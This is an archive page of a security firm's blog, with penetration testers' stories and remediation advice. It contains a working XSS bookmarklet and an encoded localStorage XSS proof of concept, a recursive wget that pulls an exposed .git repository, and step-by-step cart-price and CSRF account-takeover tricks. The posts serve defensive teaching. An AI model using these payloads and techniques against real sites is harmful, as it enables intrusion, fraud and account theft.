Category Archives: True Stories of the TRC

“Insufficient Authorization – The Basics” Webinar Questions – Part I

Recently we offered a webinar on a really interesting Insufficient Authorization vulnerability. A site that allows users to live chat with a customer service representative updated the transcript using a request parameter that an attacker could have manipulated to view a different transcript, potentially exposing a great deal of confidential information. Using an “email me this conversation” request in combination with various chatID parameters, an attacker could have collected sensitive information from a wide variety of customer conversations.

To view the webinar, please click here.

So many excellent questions were raised that we thought it would be valuable to share them in a pair of blog posts — here is the first set of questions and answers:

Did you complete this exploit within a network or from the outside?
Here at WhiteHat, we do what is called black box testing: we test applications from outside their network, knowing nothing of the internal workings of the application or its data mapping. This makes testing more authentic, because in most cases the attacker isn’t inside the network, either.

What is the standard way to remediate these vulnerabilities? Via safer coding?
The best way to remediate this vulnerability is to implement a granular access control policy, and ensure that the application’s sensitive data and functionalities are only available to the users/admins who have the appropriate permissions.
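As a sketch of what that looks like in code, a server-side handler should verify that the requested transcript actually belongs to the authenticated user before doing anything with it. The function and field names below (canViewTranscript, ownerId, the session shape) are invented for illustration, not taken from the application discussed in the webinar:

```javascript
// Hypothetical sketch of a granular access control check on a chat transcript.
// The session shape, permission strings, and ownerId field are assumptions.
function canViewTranscript(session, transcript) {
  // Support staff with an explicit permission may view any transcript.
  if (session.permissions.includes("support:read-all-transcripts")) {
    return true;
  }
  // Regular users may only view transcripts they own.
  return transcript.ownerId === session.userId;
}

function handleEmailTranscript(session, transcript) {
  if (!canViewTranscript(session, transcript)) {
    // Deny by default: never trust a client-supplied chatID on its own.
    throw new Error("403 Forbidden");
  }
  return `Emailing transcript ${transcript.id} to ${session.email}`;
}
```

The key point is that the chatID parameter is only a lookup key; the authorization decision is made against server-side ownership data that the client cannot manipulate.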

Can you please elaborate on Generic Framework Solution and Custom Code Solution?

Most frameworks have options for access control. The best thing to do is take advantage of these, and restrict the appropriate resources/functionalities so that only people who actually require the access are allowed access. The best approach to custom coding a solution is to apply the least-privilege principle across all data access: allow each role access only to the data that is actually required to perform the related tasks. In addition, data should never be stored in the application’s root directory; this minimizes the possibility that those files can be found by an unauthorized user who simply knows where to look.
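A minimal illustration of that least-privilege mapping follows; the role and permission names are invented for the example and do not come from any particular framework:

```javascript
// Hypothetical role-to-permission map: each role gets only the permissions
// its tasks actually require, and unknown roles get nothing.
const rolePermissions = {
  customer: ["chat:read-own", "chat:email-own"],
  agent: ["chat:read-own", "chat:read-assigned"],
  admin: ["chat:read-own", "chat:read-all", "chat:delete"],
};

function hasPermission(role, permission) {
  // Deny by default for roles that are missing from the map.
  return (rolePermissions[role] || []).includes(permission);
}
```

Every data access then goes through hasPermission, so granting a role broader access is a deliberate, reviewable change to the map rather than a scattered set of ad hoc checks.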

Can you talk about the tools you used to capture and manage the cookies and parameters as you attempted the exploit?
During testing, we have a plethora of tools available. For this particular test, I only used a standard proxy suite. This allows for capturing requests directly from your internet browser, editing and sending the requests, and viewing the responses. Usually, this is all that is needed to exploit an application.

What resources do you recommend for a person that is interested in learning how to perform Pen Testing?
Books, the internet, and more books! A few books that I recommend are The Hacker Playbook, The Web Application Hacker’s Handbook, and Ethical Hacking and Penetration Testing Guide. Take a look at the OWASP top ten, and dig further into each vulnerability.

How did you select this target?
Here at WhiteHat, the team that is responsible for the majority of penetration testing has a list of clients that need business logic assessments. (For a business logic assessment, we test every identifiable functionality of a site.) Each team member independently chooses a site to perform an assessment on. This particular application just happened to be the one I chose that day.

Does the use of SSL/TLS affect the exploitability of this vulnerability?
The use of SSL/TLS does not affect the exploitability. SSL/TLS simply prevents man-in-the-middle attacks, meaning that an attacker can’t relay and possibly alter the communication between a user’s browser and the web server. The proxy that I use breaks the SSL connection between my browser and the server, so that encrypted data can be viewed and modified within the proxy. Requests are then sent over SSL from the proxy.

We hope you found this interesting; more questions and answers will be coming soon — !

Lowering Defenses to Increase Security

Starting at WhiteHat was a career change for me. I wasn’t sure exactly what to expect, but I knew there was a lot of unfamiliar terminology: “MD5 signature”, “base64”, “cross-site request forgery”, “‘Referer’ header”, to name a few.

When I started testing real websites, I was surprised that a lot of what I was doing looked like this: <script>alert(1)</script>

Everything was definitely not that simple…but a lot of things were. How could I be correcting the work of people who knew so much more about computers than me? I’d talk to customers on the phone, and they already knew how to fix the vulnerabilities. In fact, they were even already aware of them, in some cases! Periodically, WhiteHat publishes statistics about how long it takes vulnerabilities to get fixed in the real world, and how many known vulnerabilities are ever fixed. The most recent report is available here, with an introduction by Jeremiah Grossman here.

SQL injection was first publicly described in 1998, and we’re still seeing it after 17 years. Somehow, the social aspects of the problem are more difficult than the technical aspects. This has been true since the very beginning of modern computing:

Apart from some less-than-ideal inherent characteristics of the Enigma, in practice the system’s greatest weakness was the way that it was used. The basic principle of this sort of enciphering machine is that it should deliver a very long stream of transformations that are difficult for a cryptanalyst to predict. Some of the instructions to operators, however, and their sloppy habits, had the opposite effect. Without these operating shortcomings, Enigma would, almost certainly, not have been broken.

Speaking of the beginning of computing, The Psychology of Computer Programming (1971) has the following passage about John von Neumann:

John von Neumann himself was perhaps the first programmer to recognize his inadequacies with respect to examination of his own work. Those who knew him have said that he was constantly asserting what a lousy programmer he was, and that he incessantly pushed his programs on other people to read for errors and clumsiness. Yet the common image today of von Neumann is of the unparalleled computer genius: flawless in his every action. And indeed, there can be no doubt of von Neumann’s genius. His very ability to realize his human limitations put him head and shoulders above the average programmer today.

Average people can be trained to accept their humanity – their inability to function like a machine – to value it and work with others so as to keep it under the kind of control needed if programming is to be successful.

The passage above is from a section of the book called “Egoless Programming.” It goes on to describe an anecdote in which a programmer named Bill is having a bad day and calls Marilyn over to look at his code. After she finds 17 bugs in 13 statements, he responds by seeing the humor in the situation and telling everyone about it. Marilyn, in turn, figures that if she could spot 17 bugs there must be more, and indeed others spot 3 more. The code was put into production and ran without problems for 9 years.

The author of the book, Gerald Weinberg, made another interesting observation:

Now, what cognitive dissonance has to do with our programming conflict should be vividly clear. A programmer who truly sees his program as an extension of his own ego is not going to be trying to find all the errors in that program. On the contrary, he is going to be trying to prove that the program is correct, even if this means the oversight of errors which are monstrous to another eye. All programmers are familiar with the symptoms of this dissonance resolution — in others, of course…And let there be no mistake about it: the human eye has an almost infinite capacity for not seeing what it does not want to see. People who have specialized in debugging other people’s programs can verify this assertion with literally thousands of cases. Programmers, if left to their own devices, will ignore the most glaring errors in their output—errors that anyone else can see in an instant. Thus, if we are going to attack the problem of making good programs, and if we are going to start at the fundamental level of meeting specifications, we are going to have to do something about the perfectly normal human tendency to believe that one’s “own” program is correct in the face of hard physical evidence to the contrary.

What is to be done about the problem of the ego in programming? A typical text on management would say that the manager should exhort all his programmers to redouble their efforts to find their errors. Perhaps he would go around asking them to show him their errors each day. This method, however, would fail by going precisely in the opposite direction to what our knowledge of psychology would dictate, for the average person is going to view such an investigation as a personal trial. Besides, not all programmers have managers — or managers who would know an error even if they saw one outlined in red.

No, the solution to this problem lies not in a direct attack — for attack can only lead to defense, and defense is what we are trying to eliminate. Instead, the problem of the ego must be overcome by a restructuring of the social environment and, through this means, a restructuring of the value system of the programmers in that environment.

By the nature of what we do, WhiteHat does try to find mistakes in other people’s work. It’s not personal, and those mistakes are rarely unique! In the big picture, what brought us computers was the scientific method, that is, the willingness to learn from mistakes.

How I stole source code with Directory Indexing and Git

The keys to the kingdom pretty much always come down to acquiring source code for the web application you’re attacking from a blackbox perspective. This is a quick review of how I was able to get access to a particular client’s application source code using an extremely simple vulnerability: Directory Indexing. Interestingly enough, they also had a .git repository accessible at https://www.[redacted].com/.git/ (although the ‘why’ still baffles me). If you have access to this you also have access to any commits and all logs that may exist in the repo.

The following screenshots are from a recreation of the environment, run locally and mapped via /etc/hosts. All client information has been redacted.


First, I confirmed that Directory Indexing was enabled. You’ll see why this is great in a moment.


The easiest way to download everything is a recursive wget (you simply need to set the -r flag):

wget -r https://www.[redacted].com/.git/


Now let’s investigate. With the repository downloaded we can perform git commands on it.


Now that we can see which files exist in the repository, access to them is as simple as checking them out.

git checkout *.php; ls;


This example is clearly simplified; however, the real site allowed me to find several SQL Injections and authorization bypasses that would have been cumbersome to find through dynamic blackbox testing alone. It also allowed me to find several files that would otherwise have been available only if you had the appropriate credential access. These types of flaws are easily found through static code analysis and much harder to find through a dynamic assessment only. As a hacker, turning a blackbox penetration test into a whitebox penetration test is always a victory.


20,000. That’s the number of websites we’ve assessed for vulnerabilities with WhiteHat Sentinel. Just saying that number alone really doesn’t do it justice, though. The milestone doesn’t capture the gravity and importance of the accomplishment, nor does it fully articulate everything that goes into that number, and what it took to get here. As I reflect on 20,000 websites, I think back to the very early days, when so many people told us our model could never work, that we’d never see 1,000 sites, let alone 20x that number. (By the way, I remember their names distinctly. ;)) In fairness, what they couldn’t fully appreciate then was what it really takes to scale Web security, which means they didn’t truly understand Web security.

When WhiteHat Security first started back in late 2001, consultants dominated the vulnerability assessment space. If a website was [legally] tested for vulnerabilities, it was done by an independent third party. A consultant would spend roughly a week per website, scanning, prodding around, modifying cookies, URLs and hidden form fields, and then finally deliver a stylized PDF report documenting their findings (aka “the annual assessment”). A fully billed consultant might be able to comprehensively test 40 individual websites per year, and the largest firms would have maybe as many as 50 consultants. So collectively, the entire company could only get to about 2,000 websites annually. This is FAR shy of just the 1.8 million SSL-serving sites on the Web. This exposed an unacceptable limitation of their business model.

WhiteHat, at the time of this writing, handles 10x the workload of any consulting firm we’re aware of, and we’re nowhere near capacity. Not only that, WhiteHat Sentinel is assessing these 20,000 websites on a roughly weekly basis, not just once a year! That’s orders of magnitude more security value delivered than what one-time assessments can possibly provide. Remember, the Web is a REALLY big place, like 700 million websites big in total. And that right there is what Web security is all about: scale. If any solution is unable to scale, it’s not a Web security solution. It’s a one-off. It might be a perfectly acceptable one-off, but a one-off nonetheless.

Achieving scalability in Web security must take into account the holy trinity, a symbiotic combination of People, Process, and Technology – in that order. No [scalable] Web security solution I’m aware of can exist without all three. Not developer training, not threat modeling, not security in QA, not Web application firewalls, not centralized security controls, and certainly not vulnerability assessment. Nothing. No technological innovation can replace the need for the other two factors. The best we can expect of technology is to increase the efficiency of people and processes. We’ve understood this at WhiteHat Security since day one, and it’s one of the biggest reasons WhiteHat Security continues to grow and be successful where many others have gone by the wayside.

Over the years, while the vulnerabilities themselves have not really changed much, Web security culture definitely has. As the industry matures and grows, and awareness builds, we see the average level of Web security competency decrease! This is something to be expected. The industry is no longer dominated by a small circle of “elites.” Today, most in this field are beginners, with 0 – 3 years of work experience, and this is a very good sign.

That said, there is still a huge skill and talent debt everyone must be mindful of. So the question is: in the labor force ecosystem, who is in the best position to hire, train, and retain Web security talent – particularly the Breaker (vulnerability finders) variety – security vendors or enterprises? Since vulnerability assessment is not and should not be in most enterprises’ core competency, AND the market is highly competitive for talent, we believe the clear answer is the former. This is why we’ve invested so greatly in our Threat Research Center (TRC) – our very own professional Web hacker army.

We started building our TRC more than a decade ago, recruiting and training some of the best and brightest minds, many of whom have now joined the ranks of the Web security elite. We pride ourselves on offering our customers not only a very powerful and scalable solution, but also an “army of hackers” – more than 100 strong and growing – that is at the ready, 24×7, to hack them first. “Hack Yourself First” is a motto that we share proudly, so our customers can be made aware of the vulnerabilities that exist on their sites and can fix them before the bad guys exploit them.

That is why crossing the threshold of 20,000 websites under management is so impressive. We have the opportunity to assess all these websites in production – as they are constantly updating and changing – on a continuous basis. This arms our team of security researchers with the latest vulnerability data for testing and measuring and ultimately protecting our customers.

Other vendors could spend millions of dollars building the next great technology over the next 18 months, but they cannot build an army of hackers in 18 months; it just cannot be done. Our research and development department is constantly working on ways to improve our methods of finding vulnerabilities, whether with our scanner or by understanding business logic vulnerabilities. They’re also constantly updated with new 0-days and other vulnerabilities that we try to incorporate into our testing. These are skills that take time to cultivate and strengthen and we have taken years to do just that.

So, I have to wonder: what will 200,000 websites under management look like? It’s hard to know, really. We had no idea 10+ years ago what getting to 20,000 would look like, and we certainly never would have guessed that it would mean processing more than 7TB of data per week across millions of dollars of infrastructure. That said, given the speed at which the Internet is growing and the speed at which we are growing with it, we could reach 200,000 sites in the next 18 months. And that is a very exciting possibility.

HackerKombat II: Capturing Flags, Pursuing the Trophy

Years ago, a small group of 5-6 of us at WhiteHat held impromptu hacking contests – usually over lunch or during breaks in the day – in which we would race each other to be the quickest to discover vulnerabilities in real live customer websites (banks, retailers, social networks, whatever). No website survived longer than maybe 20 minutes. These contests were a nice break in the day and they allowed us to share (or perhaps show off) our ability to break into things quickly. The activity usually provided comic relief, moments of humility, :) and most importantly they opened opportunities to learn from each other.

We have scores of extremely talented and creative minds working at WhiteHat and these activities were some of the earliest testaments to that. Our corporate culture is eager to break what was previously thought of as “secure,” often just for the fun and challenge. Today, WhiteHat has more than 100 application security specialists in our Threat Research Center (TRC) alone – essentially our own Web hacker army. With so many people now, our contests were forced to evolve, to grow and to mature. We now organize a formal internal activity called HackerKombat.

HackerKombat is a WhiteHat employee only event, a game we hold every couple of months, a late-night battle between some of the best “breakers” in the business. HackerKombat is our version of a “Hackathon,” which companies like Facebook and others host as a means to challenge their engineers to build cool new apps, new features, etc.


HackerKombat challenges our team to break things — to break websites and web applications, to test our hacker skills in a pizza and alcohol infused environment. The goals are to have some fun in a way that only hackers could appreciate, but also to encourage teamwork and thinking outside the box, and to expose areas of knowledge where we are weak.

Unlike years past, the websites and applications we target are staged – no more hacking live customer sites! We have learned that while the average business-driving website might withstand the malicious traffic of a few hackers targeting it, a dozen or more could easily cause downtime. We certainly can’t have that, and you’ll see later in this post how easily it can happen.

The HackerKombat challenges are designed by Kyle Osborn (@theKos), a WhiteHat TRC alumnus, accomplished security researcher, and frequent conference speaker, who is currently employed by Tesla Motors. Challenges are also developed by current TRC members, but doing so disqualifies them from actually playing — gotta keep things as fair as we can. There isn’t much in the way of rules for HackerKombat. I mean, are hackers expected to follow them anyway? 😉

Today, finding a single vulnerability is nowhere near enough to claim victory. HackerKombat is a series of challenges that are very difficult and require a wide variety of technical ability. Defeating every challenge requires a great team, and great teamwork. No way can a single person, even the best and brightest among us, get through every challenge and expect to have any chance of winning. Past events have shown there is strength in numbers – so we also had to cap the team size at 5-6 to keep things even.

A few weeks ago we hosted the second formal event – HackerKombat II. Teams were decided by draft, for a total of six teams with five combatants each spanning our Santa Clara headquarters as well as in our TRC location in Houston. In the hours leading up to HK II the trash talking was constant and searing. There was even an office pool posted and people were placing bets on the winning team! The biggest prize of all: our custom trophy.


The exact moment the game began the trash-talking ceased, poker faces were set – chatter became eerily quiet. If you wanted to win, and everyone did, every second and key press mattered. If someone was active on Jabber (chat client), you knew they were stuck. 😉

Each team’s approach to the 10 challenges was probably different. My team – “Zerg” – triaged each challenge first: we determined what skill sets it would require and assigned it to the right team member to tackle. The first 4 or so challenges were completed fairly easily within the first hour. For the next 2-3 challenges we had to pair up to defeat them, and writing some code was necessary. Another hour gone. Then things got hard, really hard, and every team’s progress slowed way down.

Some of the challenges posed interesting hurdles that the designers did not anticipate. For instance, one challenge required teams to run DirBuster, which brute-forces web requests looking for a hidden web directory. The problem, however, is that a single Apache web server is not used to handling a dozen people all doing the same thing and sending thousands of requests per second. The challenge server died. Remember how I mentioned downtime? Apparently, speed in capturing that particular flag was the winning skill because no other team could get in to tackle it! Argh!

For the most difficult challenges, 9 and 10, Zerg had to gel as a team to figure out the best approach and make incremental gains. I’m clearly very weak in my steganography skills. It was terribly frustrating to be so close to victory and unable to seal the deal; an hour of study beforehand would have been enough.

In the end, the winning team –  “Terrans” from Santa Clara – prevailed by completing all 10 challenges and capturing all 12 flags in a time of 4h and 46min, barely edging out the team in Houston – “PurpleStuff” – which came in second at 4h and 49min. Yes, when it was all said and done, 3 minutes separated the leaders. Imagine that!

In another moment of humility, Robert Hansen (@RSnake), another “great” in the industry, can at least claim he beat me and came in second. :) I’m not exactly certain even now where my team placed, probably around 4th, as every team managed to capture at least 10 flags before the Terrans claimed ultimate victory.  I congratulate Rob, Nick, Dustin, Jon Paul and Ron for their win.

All in all, HK II was fun for all involved and everyone learned a great deal. We learned new techniques that the bad guys can use in the wild, and we learned where each of us individually needs to brush up on our studies. HK II’s success makes a founder very proud. I’m sure there are few, if any, companies that can pull off such an event.

 I look forward to HK III. I want that trophy!

[Check out photos from JerCon and HK II here.]

Web Storage Security

The web waits for no one, not even W3C.

While the HTML5 specification isn’t finalized, and HTML5 Storage has even been broken out into its own Web Storage specification that is even further from being finalized, code continues to move to the client, and more developers are (mis)using the next-generation features already available in browsers. Engineers and researchers in the WhiteHat Security Threat Research Center are in a unique position to know that “where there is code, there are vulnerabilities,” and JavaScript is certainly no exception.

Over the past few months, the Threat Research Center has implemented new checks into WhiteHat Sentinel to better identify and analyze the usage of Web Storage and its potential security impact.  During the course of this research, I analyzed over 600 applications that made at least one call to Web Storage — “getItem” or “setItem”.  The preliminary results may surprise you. They sure surprised me.

Before I jump into the vulnerability discussion, a brief word about some of the so-called “security advice” concerning HTML5 APIs and specifically Web Storage. I’ll be the first to admit that before this project I’d never used the Web Storage APIs; this was a from-scratch effort. Like any good developer (or hacker) learning a new technology, I googled “Web Storage Security”, “localStorage Security”, and “HTML5 Storage Security”. The results were somewhat discouraging.  I couldn’t find a single vulnerable code example and most security commentaries boiled down to either “there is no major risk” or “if developers use Web Storage properly there is no risk.”

The argument is that because stored values aren’t transmitted over HTTP we actually have a more secure option for storing data that is only needed on the client. In my opinion, this is just flat out wrong.  Arguing that “if developers use it correctly there is no risk” is like saying “if PHP developers use $_GET correctly there won’t be any problems.” We all know how that turns out.

So I knew I needed to go to the source. Section 7 of the Web Storage Specification is titled “Security”; certainly we can get some good advice here. Honestly though, I found section 7.1’s warning about DNS spoofing attacks and 7.2’s warning about cross-directory attacks to be a bit hollow. I’m not saying these attacks don’t exist, but certainly we can give some better advice than “Use TLS” and “Don’t implement on shared domains”. Section 7.3, on implementation risks, appears to be entirely targeted at browser makers. If developers can’t go to W3C for advice on how and how not to use Web Storage securely, then where can they go? It looks like we are back to Stack Overflow and random blog posts. With that being the state of security advice on Web Storage, I figured I’d throw my hat in the ring.

Examples of Vulnerability:

Evil Roommate / Public Computer

Firefox’s about:home page is vulnerable to DOM (Document Object Model) XSS via localStorage injection through the snippets functionality. While I can’t send you a link or build a malicious website to exploit this issue, I’m willing to bet that thousands of people use Firefox on a shared or public computer every day. It sure would be nice to be able to log all of those keystrokes, even after the browser is closed and private data has been cleared.

Screen Shot 2013-05-18 at 5.12.34 AM

Just sit down and run a weaponized version of the following bookmarklet:

javascript:window.localStorage.setItem('snippets','<iframe src="" onload="prompt()" style="width:100%;height:100%;z-index:9999999;position:absolute;left:0px;top:0px;"/>');

When contacted about the above issue via email the Mozilla security team advised that they are migrating the functionality off of localStorage for reasons other than security. Even so, I’ll be keeping my Firefox usage to my own computer that is always locked whenever I am not using it. At least until this functionality is patched.

DOM XSS -> localStorage XSS -> the persistent vector your server will never see.

Vulnerable Code:

<script language="JavaScript">

var Id = getParamValue("id");
var persistId = localStorage.getItem('id');

if ( isValid(Id) ) {
    document.write('<a href="' + Id + '" id="store_locator">');
    document.write('<div>Find Store</div>');
} else if ( localStorage && isValid(persistId) ) {
    // Anything already sitting in localStorage is written into the DOM
    // exactly as if it had come from the URL parameter.
    document.write('<a href="' + persistId + '" id="store_locator">');
    document.write('<div>Find Store</div>');
} else {
    document.write('<a href="" class="scroll linktomap" id="store_locator">');
    document.write('<div>Find Store</div>');
}

</script>

Proof of Concept:

<a href="'"><img/src="x"onerror=eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41))>

The String.fromCharCode here just makes it easier to insert the needed injection into localStorage without excessive quote escaping. Here is what it decodes to:

window.localStorage.setItem('id','"><img/src=\"x\"onerror=alert(1)>')
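The decode can be verified in any JavaScript console; this snippet simply reproduces the character codes from the proof of concept above:

```javascript
// Decode the String.fromCharCode payload from the proof of concept.
const codes = [
  119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,
  46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,
  103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,
  97,108,101,114,116,40,49,41,62,39,41,
];
const decoded = String.fromCharCode(...codes);
console.log(decoded);
```

Running it prints the injected value that ends up in localStorage under the 'id' key.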


The Always and Never of Web Storage


Always validate, encode, and escape user input before placing it into localStorage or sessionStorage.

Always validate, encode, and escape data read from localStorage or sessionStorage before writing it onto the page (DOM).

Always treat all data read from localStorage or sessionStorage as untrusted user input.


Never store sensitive data using Web Storage: Web Storage is not secure storage. It is not “more secure” than cookies just because it isn’t transmitted over the wire. It is not encrypted, and there are no Secure or HttpOnly flags, so this is not a place to keep session tokens or other security tokens.

Never use Web Storage data for access control decisions, and never trust the serialized objects you store there for other critical business logic. A malicious user is free to modify their localStorage and sessionStorage values at any time; treat all Web Storage data as untrusted.

Never write stored data to the page (DOM) with a vulnerable JavaScript or library sink. Here is the best list of JavaScript sinks that I am aware of on the web right now. While it is true that a perfect storm of tainted data flow must exist for a remote exploit that relies 100% on Web Storage, you must consider two alternate scenarios. First, consider the evil roommate, or the unlocked, unattended, or public computer: a malicious user gains temporary physical access to your user’s web browser. The computer’s owner may have prevented a low-privileged user from installing malicious add-ons, but I’ve never seen a user prevented from making a bookmark. Second, don’t ignore the possibility of improper Web Storage usage escalating another vulnerability, such as turning reflected cross-site scripting into persistent cross-site scripting.
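To make the “Always” rules concrete, here is a minimal sketch of HTML-encoding a Web Storage value before it ever touches the DOM. The htmlEncode helper is illustrative only; in production code a vetted encoding library is preferable to rolling your own:

```javascript
// Minimal HTML-encoding helper (illustrative; prefer a vetted library).
function htmlEncode(value) {
  return String(value)
    .replace(/&/g, "&amp;")   // ampersand first, so later entities aren't double-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Treat anything read from Web Storage as untrusted user input.
function safeReadFromStorage(storage, key) {
  var raw = storage.getItem(key) || "";
  return htmlEncode(raw);
}
```

With this in place, a persisted payload like the one in the proof of concept above would render as inert text instead of executing.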

Insufficient Process Validation

There are some vulnerabilities that security scans and code review will not find; they can only be discovered by business logic testing. Insufficient process validation is a perfect example of this kind of vulnerability.

Insufficient process validation occurs when a Web application fails to prevent an attacker from circumventing the intended flow or business logic of that application.

Finding insufficient process validation requires the tester to be patient and to be willing to explore every parameter. When playing video games, if you like to explore the entire map for items before moving to the next map, then you have the patience required to find insufficient process validation vulnerabilities.

Testing acme.cxx

I was able to find insufficient process validation on − let’s call it acme.cxx − an online store. After some time on the site I found a page where I could buy a gift certificate. Unlike the other product pages, which listed a specific price for each item, the gift card purchase page allowed me to enter an amount.

It was time to select the amount for my gift card, but I noticed the site did apply some limits to the value I could enter: In this case a minimum of $10 and a maximum of $5,000 per gift card purchase. Next, before trying any fancy deception, I decided to see how this functionality worked when I purchased a gift card whose amount was within the allowed limits. So I sent a request to add a gift card for $55 to my shopping cart. Then, when I looked at my request, I found two parameters that had 55 as their value: exampleparam1=55 and exampleparam2=55.

I tested these two parameters by trying to bypass the site’s gift card limits, changing the value to 9999. By using one parameter at a time, I discovered that the only parameter that affected the shopping cart − and the value of the total order − was exampleparam2. After this initial test, I emptied my shopping cart to avoid any confusion later on.

Having successfully bypassed a limit set by the application, I then put on my black hat and thought: Can I gain even more for myself, now that I’ve discovered this security flaw?

Given that attackers usually attempt to cheat a Web store by exceeding discount levels and/or getting items for free, I added two items to my shopping cart: one costing $1,575 and one costing $21.99, to see if I could get them for free or at least at a juicy discount. With those two items in my cart, I went to the gift card page to add a gift card as well; this time, however, I changed the value of the vulnerable parameter, exampleparam2, to -1500.

The moment of truth had arrived: What would be the result of my discovery and subsequent attack? Well, when I checked my shopping cart I saw that my experiment had indeed worked. I had successfully purchased both the pricey $1,575 item and the random $21.99 item for a mere $96.99.

BUT! Deep down I knew that I still needed to make sure the parameter was affecting the entire transaction – and not just the shopping cart. So I clicked continue checkout, which took me to the shipping method page. There, of course, I selected free shipping; clicked continue checkout again, which took me to the Review and complete your order page. Once there, I scrolled down the page and smiled, because the Order Total and the Total Amount to be charged to my “account” was only $236.73!

This means that my ploy had indeed worked; I obtained a total savings of $1,500! In fact, the only two “legitimate” full costs that I had to pay were the cheap $21.99 item and sales tax. But, hey! That’s okay, our cities and counties need the money.

Root of the Issue

Let’s say you’re performing some business logic testing…specifically, you’re testing the quantity of items on an e-commerce site. When you try to add a negative amount of items to your cart, the site responds with a negative number of items. However, the cart page reflects a regular price. Darn, they’ve thought of that issue and have eliminated it.

Should you stop your testing?

The persistent hacker would definitely say, “No way!”

I came across this exact issue on a major, unnamed e-commerce site. (This vulnerability has since been remediated.)

In the above example that I discovered, the all-too-common issue that many e-commerce sites once faced was fixed, but was it fixed for good, or was the fix just “a bandage placed over an open wound?” On the site that I assessed, the wound definitely had a bandage on it, but what it really needed was stitches!

I say that because I was still able, quite easily, to add negative items to my cart, although I would still have to pay the correct amount at checkout. So I started experimenting with the site’s cart and its checkout procedures. The result? I found an interesting loophole.

Here’s what I discovered: Let’s say you added one $50 grill to your cart, and then added gift wrapping. The total price would then be $54; thus, gift wrapping costs $4. Now add a “negative” 27 towels at $2 each, making your new total $108. Then add the gift-wrapping option for the towels, and your final total price becomes zero!
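The arithmetic behind that loophole can be sketched in a few lines. This is a guess at the flawed pricing logic, reconstructed from the behavior described above − not the site’s actual code:

```python
# Hypothetical reconstruction of the flawed cart logic: item prices were
# corrected for negative quantities, but the gift-wrap fee path was not.

def cart_total(items, wrap_fee=4):
    total = 0
    for price, qty, gift_wrapped in items:
        total += price * abs(qty)      # item subtotal: quantity "corrected"
        if gift_wrapped:
            total += wrap_fee * qty    # BUG: fee still uses the raw quantity
    return total

cart = [
    (50, 1, True),    # $50 grill plus gift wrap: $54
    (2, -27, True),   # "negative" 27 towels at $2 each, also gift wrapped
]
print(cart_total(cart))  # 0 -- the negative wrap fees wipe out the order
```

The item-price path and the gift-wrap path each handled the quantity differently, which is exactly the kind of inconsistency that business logic testing uncovers.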

To add even more fuel to the fire, the checkout process was nice enough to require no billing information if the total was “zero” dollars. The site documented that this could occur if gift cards were used. We didn’t even have to enter any personal information whatsoever to receive products!


The problem described here occurred because the site developers failed to ensure that every other piece of functionality and code in the ordering process used the corrected values. The raw input the user provided should have been rejected or corrected immediately, on the first request, before it reached any other functionality, instead of only patching up the very end result if it didn’t match certain criteria.
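A minimal sketch of that principle, with hypothetical field names and limits: validate the raw values once, at the boundary, so no downstream code path ever sees them.

```python
# Minimal sketch: validate raw order input on the first request, so the
# cart, gift-wrap, and checkout code never see bad values. Field names
# and rules here are illustrative, not the real site's.

def normalize_order_item(price, quantity):
    if price < 0:
        raise ValueError("negative price rejected")
    if quantity < 1:
        raise ValueError("quantity must be a positive integer")
    return price, quantity

print(normalize_order_item(50, 1))   # clean input passes through unchanged
```

Every later step then works only with values that have already passed the check, instead of each code path re-implementing − or forgetting − its own correction.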

Although I thoroughly tested all the way up to the final checkout confirmation, I did not confirm that the order was accepted, because WhiteHat provides only production-safe solutions.

The most important lesson here is that it is always essential to fix the root of every vulnerability, rather than simply applying a quick fix. Because as this example shows, the results can otherwise be disastrous.

Chained Exploits

Sometimes the newsworthy stories of businesses getting compromised come down to a single exploited vulnerability, but usually it is the chaining of two, three, four, or more vulnerabilities together that leads to the compromise.

That’s where WhiteHat comes in. WhiteHat will report not just the XSS, SQL Injection, and CSRF, but also the Information Leakage, Fingerprinting, and other vulnerabilities. Those vulnerabilities may not be much by themselves, but if I see your dev and QA environments in commented-out HTML source code in your production environment, I just found myself new targets. That QA environment may or may not run the same code as production, but does it have the same configurations? The same firewall settings? Are its log files monitored like production’s? I now have a leg up into your network, all because of an Information Leakage vulnerability that I was able to leverage and chain together with other vulnerabilities. How about a Fingerprinting vulnerability that tells me you are running an out-of-date version of nginx or PHP or Ruby on Rails, a version I happen to know is vulnerable to Remote Code Execution, Buffer Overflow, Denial of Service, or something else? You just made my job much easier. Doesn’t seem so benign now, does it?

But let’s assume for a moment that you take care of those problems. You turn off stack traces, you get rid of private IP addresses in the response headers. What next? Let’s build another scenario, one that I encountered recently.

Consider a financial institution that provides online statements to users for their accounts. To encourage users to choose online statements over paper ones, it charges a nominal fee for paper versions of their imaged checks. As part of the log-in process, in addition to the username and password, a user must answer one or more security questions before gaining access to the account. This helps prove that it is the real user, and not someone who managed to obtain or guess the username and password.

Have that vision in your head? Now, what if I told you that I could CSRF transferring funds, but only between the accounts you have, perhaps a checking account and a credit card account? That surely can’t be bad, can it? Well, it turns out that the user gets charged whenever a cash advance is made from their credit card to their checking account. Okay, so I can rack up some charges. But what if I want to do something else? Say, CSRF changing their username? If you’ll recall, I need the password too, along with the security questions. No go on the password and security questions. But I can CSRF changing the user from online statements to paper statements and, for added fun, make them get charged for the imaged checks. My fun doesn’t stop there. The crème de la crème. The pièce de résistance. The go big or go home. CSRF on the mailing address.

Why is that such a big deal, you ask? Now I know the username of the account. I have active account statements sent to a mailing address I control, along with imaged checks. And then, all I need to do is call the bank’s customer support, ask about “my” account, using “my” username, “my” account number, and the details of the imaged checks just in case the bank asks for further confirmation to prove that I am who I say I am.

And then I say: “Oh, and I’m calling because I forgot both my password and the answer to my security questions.”

Is it common for users to forget their security questions? Yes. I used to be in the habit of providing fake answers to security questions, because I didn’t want an attacker who knew or could guess the real answers to get into my accounts. But, me being me, I forgot the fake answers and lost access to the account. Others may be in the same habit.

So you gotta ask yourself, what’s one vulnerability?

Capture ALL the Flags

